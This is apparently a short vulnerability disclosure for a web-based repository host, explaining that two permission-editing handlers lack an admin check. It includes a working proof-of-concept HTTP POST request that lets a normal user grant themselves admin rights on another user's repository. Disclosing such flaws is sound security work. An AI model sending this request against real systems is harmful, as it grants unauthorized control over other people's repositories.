incorrect_access_control_via_edit_permission.md

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn't have access to.

This allows the user to get full admin access to the repository.

edit_permissions_update and edit_permissions_revoke are not decorated with @HasRepoPermissionAllDecorator('repository.admin').

More info here.

POC:

Set your your_token_here and your_username.

After this your_username obtains repository.admin access to not_my_secret_repo.

POST /not_my_secret_repo/settings/permissions HTTP/1.1
Host: localhost:5000
Content-Length: 225
Connection: close

_method=put&_authentication_token=%your_token_here%&repo_private=False&u_perm_default=repository.admin&perm_new_member_1=repository.admin&perm_new_member_name_1=%your_username%&perm_new_member_type_1=user&save=Save